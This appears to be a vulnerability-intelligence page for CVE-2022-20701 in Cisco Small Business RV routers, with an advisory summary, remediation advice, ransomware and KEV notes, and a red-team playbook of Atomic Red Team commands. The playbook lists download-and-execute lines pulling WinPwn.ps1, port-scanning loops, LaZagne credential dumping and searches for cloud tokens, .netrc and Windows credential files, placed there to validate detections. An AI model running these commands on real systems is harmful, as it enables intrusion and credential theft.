CVE-2022-20701
Overview
The vulnerabilities stem from multiple memory safety issues including stack-based buffer overflows and improper input validation within the Cisco Small Business RV Series Router firmware. These flaws reside in the router's firmware components responsible for processing network management and authentication functions, allowing crafted network packets or requests to corrupt memory or bypass security checks. Affected components include firmware modules handling authentication, command execution, and software update verification mechanisms.
Vulnerability Description
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
Impact
An attacker with network access can exploit these vulnerabilities without authentication or user interaction to execute arbitrary code, escalate privileges, bypass authentication, and run unsigned software on affected routers. This results in full device compromise, enabling interception or manipulation of network traffic, lateral movement within internal networks, and disruption of network services. The ability to cause denial of service further impacts availability of critical network infrastructure in business environments.
Solution
Cisco has released firmware updates addressing these vulnerabilities for the Small Business RV Series routers as detailed in Cisco Security Advisory cisco-sa-smb-mult-vuln-KA9PK6D. Administrators should upgrade affected devices to the latest firmware versions provided on Cisco's official support portal. The advisory includes specific version numbers and installation instructions. No effective workarounds are recommended; applying the vendor-supplied patches is required to remediate these issues.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerabilities present in the Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers are critical in nature, with a maximum severity rating indicating a high potential for exploitation. These flaws allow attackers to execute arbitrary code, elevate privileges, and bypass authentication mechanisms. The underlying technical issues stem from improper input validation and insufficient security controls within the firmware of these routers. Such weaknesses can lead to unauthorized access, enabling attackers to manipulate the router’s functionality, install malicious software, or even disrupt network services entirely.
Attack vectors for these vulnerabilities are varied and can be exploited through both local and remote means. An attacker could leverage network access to send specially crafted packets to the affected devices, triggering the execution of arbitrary commands. This could be done without prior authentication, allowing an attacker to gain control over the device and execute malicious payloads. Additionally, the ability to fetch and run unsigned software poses a significant risk, as it could enable the installation of malware that compromises the integrity of the entire network. Scenarios may include an attacker gaining access to sensitive data, intercepting network traffic, or launching further attacks against connected devices.
The real-world impact of these vulnerabilities is substantial, particularly for small to medium-sized businesses that rely on these routers for their networking needs. A successful exploitation could lead to data breaches, loss of sensitive information, and significant downtime due to denial of service conditions. The financial implications can be severe, not only from the immediate costs associated with remediation and recovery but also from potential regulatory fines and reputational damage. Businesses may find themselves vulnerable to compliance violations if sensitive customer data is exposed, leading to long-term consequences that extend beyond the initial incident.
To detect and mitigate these vulnerabilities, organizations should implement a multi-layered security approach. Regularly updating the router firmware is crucial, as manufacturers often release patches to address known vulnerabilities. Network monitoring tools can help identify unusual traffic patterns or unauthorized access attempts, providing early warning signs of potential exploitation. Additionally, employing strong authentication mechanisms, such as two-factor authentication, can significantly reduce the risk of unauthorized access. Organizations should also consider segmenting their networks to limit the potential impact of a compromised device, ensuring that critical systems remain protected even if a router is breached.
In conclusion, the vulnerabilities affecting the Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers present a serious threat to network security. The potential for arbitrary code execution, privilege escalation, and unauthorized access underscores the need for immediate attention from affected organizations. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and implementing robust detection and mitigation strategies, businesses can better protect themselves against these vulnerabilities and enhance their overall cybersecurity posture.
CVE-2022-20701 has recently been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting a formal recognition of its critical exploitation potential. This inclusion elevates the vulnerability’s profile within the cybersecurity community and signals an increased urgency for monitoring and response efforts. Concurrently, the CVSS score was updated from 0.0 to a maximum of 10.0, underscoring the severity and exploitability of these flaws in Cisco Small Business RV Series routers. Our telemetry indicates a modest rise in the Exploit Prediction Scoring System (EPSS) value, suggesting a growing likelihood of exploitation attempts in operational environments. Notably, the ransomware group Akira has been newly associated with this vulnerability, marking a shift in the threat landscape where financially motivated actors may leverage these weaknesses. Although no new exploit details have surfaced, the combination of KEV listing, heightened severity scoring, and ransomware linkage significantly increases the risk profile. Defenders should interpret these developments as a clear indicator that CVE-2022-20701 is transitioning from theoretical risk to active threat, warranting enhanced vigilance despite the current absence of widespread exploit activity.
Update 2 — July 12, 2026
Recent updates to CVE-2022-20701 indicate a downward revision of its CVSS score from 10.0 to 7.8, reflecting a more nuanced understanding of the vulnerability’s exploitability and impact. Concurrently, the Exploit Prediction Scoring System (EPSS) score has experienced a modest increase, signaling a slight uptick in the likelihood of exploitation attempts as observed through CSURFACE threat intelligence. While no new exploit techniques or proof-of-concept code have been detected by our telemetry, the vulnerability remains listed in the Known Exploited Vulnerabilities (KEV) catalog, underscoring its continued relevance in the threat landscape. Notably, the ransomware group Akira remains associated with this vulnerability, suggesting that financially motivated actors maintain interest in leveraging these weaknesses despite the absence of widespread active exploitation. This evolving profile indicates that defenders should maintain heightened awareness, as the risk posture has shifted from theoretical severity to a credible, ongoing threat vector with potential for targeted abuse. The combination of a sustained KEV presence, increasing EPSS trends, and ransomware linkage elevates the urgency for monitoring and preparedness, even as direct exploitation evidence remains limited.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Rv340 Firmware | All |
cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv340w Firmware | All |
cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv345 Firmware | All |
cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv345p Firmware | All |
cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-20701 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D |
| zerodayinitiative.com |
GitHub CVE
x_refsource_MISC
|
https://www.zerodayinitiative.com/advisories/ZDI-22-412/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-20701 |